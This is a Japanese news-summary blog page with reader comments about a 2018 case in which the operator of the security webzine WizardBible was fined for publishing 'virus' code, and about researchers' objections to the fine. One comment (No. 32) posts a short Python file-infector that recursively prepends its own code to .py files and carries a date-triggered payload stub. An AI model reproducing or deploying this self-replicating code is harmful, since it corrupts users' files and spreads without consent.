ニュー即ブログν

ニュー即ブログν
スポンサーリンク

この記事をシェアする!

検察「コンピューターウイルスのプログラムを公開したら起訴するから!」研究者らから疑問の声・・・

この記事をシェアする!

1: 2018/11/21(水) 18:41:23.86 ID:CAP_USER9

情報セキュリティーに関するサイトに掲載された記事の中でウイルスのプログラムを公開したとして、サイトの管理者が検察から略式起訴され、罰金刑を受けていたことが分かりました。これに対して研究者からは、「問題とされたのは一般的なプログラムだ」として疑問や戸惑いの声が上がっています。

罰金刑を受けたのは、情報セキュリティーに関するWEBマガジン「WizardBible」を運営していた男性管理者です。

起訴状などによりますと、この管理者はサイト上でウイルスのプログラムを公開した不正指令電磁的記録提供の罪で、ことし3月に検察から略式起訴され、罰金50万円の略式命令を受けました。

問題とされたプログラムは、読者が投稿した記事に書かれていたもので、複数の研究者が検証したところ、実際はサーバーの遠隔管理などに使う一般的な機能のものだったということです。

同じようなプログラムは入門書などにも載っているということで、専門知識がないと悪用は難しいため、研究者の間ではウイルスとして摘発されたことに疑問や戸惑いの声が上がっています。

検証した研究者の1人で立命館大学の上原哲太郎教授は、「サイバーセキュリティーの研究では、攻撃手法などの情報共有は非常に重要で、こうしたことが続くと研究の萎縮を招くおそれがある」と指摘しています。

サイト管理者「悪用難しい初歩的プログラム」
略式命令を受けたサイトの男性管理者は、パソコンが押収されて仕事に支障が出たことなどから、早く終わらせたいと罰金50万円を納め、ことし4月にサイトを閉鎖したということです。

NHKの取材に対し「略式起訴されたことは重く受け止めているが、記事の内容は悪用が難しい初歩的なプログラムで、ウイルスに当たるとは思わなかった。情報セキュリティーへの理解を深める目的でサイトを運営していたが、ウイルスとして摘発される基準がよく分からず、草の根でのセキュリティー研究が難しくなる」と話しています。
法改正で摘発件数年々増加
コンピューターウイルスをめぐっては、個人情報の流出やシステムの停止などといった被害が深刻化していることから、平成23年の刑法改正で「不正指令電磁的記録に関する罪」として盛り込まれました。

法律では、正当な理由なく他人のパソコンで勝手に実行する目的で、不正にウイルスを作ったり提供したりすることなどが禁止されています。法律が施行されてから警察に摘発される件数は年々増えていて、去年1年間では75件となっています。最近では、去年10月にコンピューターウイルスの管理が不十分だった情報セキュリティー会社の社員が逮捕され、その後、不起訴となったほか、ことし6月までにホームページを閲覧した人のパソコンに仮想通貨を獲得するプログラムを組み込んでいた全国の16人が摘発されています。
専門家「絶えずウイルスの研究必要」
情報セキュリティーを教える大学の研究室では、学生などに対してコンピューターウイルスの管理を徹底するよう指導を行っています。

立命館大学の上原哲太郎教授の研究室では、監視カメラなどを狙うコンピューターウイルスを研究しています。

常に最新のウイルスの情報を入手する必要があるため、「ハニーポット」と呼ばれる特殊な機器を使ってインターネット上で実際にやり取りされているウイルスの収集を始めようとしています。

このため、ウイルスが外部に拡散しないように外との通信は原則として遮断し、学生に対しては管理の厳格化を指導しているということです。

上原教授は「情報セキュリティーはイタチごっこの世界で、より高度な技術に対応するには絶えずウイルスや攻撃者のことを知り、研究を続けていかなくてはいけない」と話していました。

“ウイルスのプログラム” 公開で罰金刑 研究者から疑問の声 | NHKニュース
情報セキュリティーに関するサイトに掲載された記事の中でウイルスのプログラムを公開したとして、サイトの管理者が検察から略式…
【おすすめ記事!】


2: 2018/11/21(水) 18:41:37.46 ID:CAP_USER9

ウイルス研究のガイドライン必要との声も
情報セキュリティーの研究者らで作る学会の研究会では、コンピューターウイルスなどを研究するにあたって学会としてのガイドラインが必要だとする声が上がっています。

先月、長野市で開かれた情報処理学会の研究会のシンポジウムには、大学や情報セキュリティー会社の研究者や弁護士などおよそ200人が参加しました。

弁護士からは「コンピューターウイルスはプロの研究者だけでなく学生など誰でもできてしまう。研究だからと言って何でも自由というわけにはいかないので一定のルールが必要だ」といった意見が出されました。

このほかにも、研究者が法律について相談できる窓口を設置するべきだとか、研究倫理の教育をさらに充実させるべきといった意見も出ました。

シンポジウムを開いたメンバーの1人で横浜国立大学の吉岡克成准教授は「現在はそれぞれの判断で研究を行っているが限界に来ている。学会でもガイドラインなどを作る活動を進めていきたい」と話していました。

3: 2018/11/21(水) 18:43:38.57 ID:OMOGlwws0
これでJPCERTとか機能するんだろか?

4: 2018/11/21(水) 18:43:40.49 ID:C0nFVS8P0
まさにJAPだな
無能の極み

5: 2018/11/21(水) 18:44:18.33 ID:FN/JYZfO0
研究できなくて詰むパターンw

7: 2018/11/21(水) 18:46:19.10 ID:sL5CIc2u0
それ、公開する必要あんのか?

24: 2018/11/21(水) 18:51:23.80 ID:xO1jCnQs0

>>7
公開しなきゃ理解し難いだろ、
まさか一々書籍買えってか。

つか、この理屈だとその本自体が違法になっちまう。

【おすすめ記事!】
スポンサーリンク
【おすすめ記事!】


8: 2018/11/21(水) 18:46:29.22 ID:90uySs0G0
コードを書くだけで起訴されるニッポンIT土人国家

9: 2018/11/21(水) 18:46:34.20 ID:8KVU08dm0
大臣がPC使わないんだから、検察が理解してなくても許される。

10: 2018/11/21(水) 18:46:55.67 ID:yxlkBbfT0
無能な働き者かい、検察のサイバー関連捜査は

11: 2018/11/21(水) 18:47:08.27 ID:kvKBcHXS0
検察内部に情報工学の専門家とかいるのか?

12: 2018/11/21(水) 18:47:45.10 ID:j8+dSEpK0
仲間内のやりとりは郵送ですよ

13: 2018/11/21(水) 18:48:11.08 ID:DNmEV+Ok0
アンチウイルス向けのテストウイルスファイル公開でも逮捕されそうだな

14: 2018/11/21(水) 18:48:15.11 ID:WXApw1lC0
リモートデスクトップとかVNCどーすんの?
あ、文系だからあれがウイルスと同じって気がつかんかw

16: 2018/11/21(水) 18:48:59.48 ID:lfcjEyqf0
問題は起訴されたことじゃなくて罰金刑の略式命令という裁判所の判断では

23: 2018/11/21(水) 18:50:53.88 ID:kvKBcHXS0
>>16
この国では起訴=有罪なんですよ
国連人権委で嗤われて、日本の大使がシャラップ!!って怒鳴ってたやつ

21: 2018/11/21(水) 18:50:39.50 ID:88Q0JhSQ0
日本の司法が50年遅れてるってホントだな

27: 2018/11/21(水) 18:53:36.83 ID:s0UR8SZ/0
対策できなくなって被害増大

28: 2018/11/21(水) 18:54:40.17 ID:KJQ2K9Jc0
ウィルス研究してるカスペルスキーも逮捕しろ。

29: 2018/11/21(水) 18:54:52.81 ID:fwvbsiuk0

馬鹿「PCの叩き方がわからない!」

このレベルじゃなwwwwwww

30: 2018/11/21(水) 18:54:54.61 ID:urKgbFVQ0
そんなこより、ウイルスって、殆ど海外製と思うんだけど、ウイルスを作った人は
無期懲役とか国連で決議すればいいのにね。
放火と同じぐらい迷惑な話だと思うんだけど。

71: 2018/11/21(水) 19:23:03.06 ID:OUiJZ4r80
telnetのバイナリ上げただけで遠隔操作のプログラム扱いされそうw

【おすすめ記事!】
スポンサーリンク
【おすすめ記事!】

31: 2018/11/21(水) 18:54:58.51 ID:rbaI7beW0
プログラムは危ないわ

32: 2018/11/21(水) 18:55:02.85 ID:zdUiU7+x0
import os
import datetime
SIGNATURE = “test”
def search(path):
filestoinfect = []
filelist = os.listdir(path)
for fname in filelist:
if os.path.isdir(path+”/”+fname):
filestoinfect.extend(search(path+”/”+fname))
elif fname[-3:] == “.py”:
infected = False
for line in open(path+”/”+fname):
if SIGNATURE in line:
infected = True
break
if infected == False:
filestoinfect.append(path+”/”+fname)
print filestoinfect
return filestoinfect
def infect(filestoinfect):
virus = open(os.path.abspath(__file__))
virusstring = “”
for i,line in enumerate(virus):
if i>=0 and i <39:
virusstring += line
virus.close
for fname in filestoinfect:
f = open(fname)
temp = f.read()
f.close()
f = open(fname,”w”)
f.write(virusstring + temp)
f.close()
def bomb():
if datetime.datetime.now().month == 4 and datetime.datetime.now().day == 1:
print “payload”
filestoinfect = search(os.path.abspath(“”))
infect(filestoinfect)
bomb()

これも一応感染機能は有るけど
こんなんで一々逮捕されるの?w

33: 2018/11/21(水) 18:55:50.43 ID:KJQ2K9Jc0
>>32
通報しました。

43: 2018/11/21(水) 18:59:43.24 ID:4FxnY5ny0
>>32
差し込むのね

34: 2018/11/21(水) 18:56:22.60 ID:fwvbsiuk0
スーパープログラマー金子さんを逮捕してストレスで殺したような国だからな

35: 2018/11/21(水) 18:56:34.53 ID:V1E1+RuP0
公開拡散させる必要はねぇべ? ウィルス研究なんて私的なもの。 ソース公開は、ブートストラップする手法。
ウィルスは、そんな存在では無い。
それゆえ、リング0や各種チップのスーパーバイザー空間アセンブラプログラマーは、貴重な存在。
日本は、全くその価値に対価を払わないけどw

51: 2018/11/21(水) 19:06:15.95 ID:zdUiU7+x0
>>35
でも 防ぐにしても色々参考になるよ
寧ろIPAとかの脆弱性の公表とかの方が悪用されてる気がするがw

36: 2018/11/21(水) 18:56:50.23 ID:JhMpwHGP0
さすがアンチテクノロジー国家

39: 2018/11/21(水) 18:57:31.49 ID:yxvioeYh0
日本の文系官僚の無能さを物語っとるな

40: 2018/11/21(水) 18:58:03.85 ID:nluLX7dB0
立場を悪用してるような企業も捕まえろよ

44: 2018/11/21(水) 19:00:10.13 ID:V7Fe3YB40
没落する国を内側から見ることが出来るのはある意味幸せなんだろうな。
これも没落のプロセス。楽しんでみるべきなんだろうな。

46: 2018/11/21(水) 19:01:49.10 ID:68zEkLHs0
研究者の間で共有すればいい情報であって
不特定多数の一般に公開する必要性はない
検察は正しい
【おすすめ記事!】
スポンサーリンク
【おすすめ記事!】


52: 2018/11/21(水) 19:07:05.69 ID:An4u1d5N0
これ、普通に流通してる遠隔サーバ管理ツールだったんでしょ?
たまったもんじゃないな

54: 2018/11/21(水) 19:08:05.45 ID:C0GV45jh0
(-_-;)y-~
これぐらいで逮捕罰金って、後進国やな。

57: 2018/11/21(水) 19:12:46.68 ID:C0GV45jh0
(-_-;)y-~
警察なり国家公認する、ウィルスでない正しいプログラムってのを、
24時間無料公開しておいてくれよ。

61: 2018/11/21(水) 19:15:40.64 ID:7/Z7KC3k0
無理なんだよ日本の警察は
交通取締でもなんでもそうだが、やらねばならないこととはかけ離れた目的でやってるから

62: 2018/11/21(水) 19:15:49.07 ID:X1I3z9+m0
こういうのって専門家と意見のすり合わせしないの?
線引きが難しいところだってあるだろうし

63: 2018/11/21(水) 19:16:02.84 ID:L4E0oagE0
真面目に生きてればウィルスの研究なんかいらんだろ
ハッカーかよ

64: 2018/11/21(水) 19:17:27.66 ID:C0GV45jh0
(-_-;)y-~
マウスのドライバも、20年前ならウィルスやろな。

65: 2018/11/21(水) 19:17:32.46 ID:+DhUvmiL0

(´・ω・`)数年前からウィンドウズに標準装備のウィルス対策機能がものすごく進化してるの
以前は新種のウィルスがあらわれる→それを解析してワクチンソフトを配布してた
だからタイムラグもあったし駆除もむずかしかった

いまは新種のウィルスが現れる前に人工知能でその構成などを予測して対策しているらしいよ
だからある時点からものすごく進化したらしい
新種のウィルスが来る前にそれを予測して既に対応してるの
そしてこの予測対応がものすごく効果をあげてる

66: 2018/11/21(水) 19:18:38.44 ID:qIdMDe9q0
あほやなあ。
手段がわからなきゃ対策も建てようがない。
未来のハッカーをちゃんと育てろよ

68: 2018/11/21(水) 19:19:06.01 ID:C0GV45jh0
(-_-;)y-~
警察が取り締まれるウィルスが無いってことになるな。

69: 2018/11/21(水) 19:20:35.97 ID:8oOQAAPL0
visualstudioをインストールしてたらウイルス作成者だもんな

74: 2018/11/21(水) 19:26:56.15 ID:KtNZ2mEQ0
頭脳と知性が道徳を打ち負かす日は、もうすぐそこだ。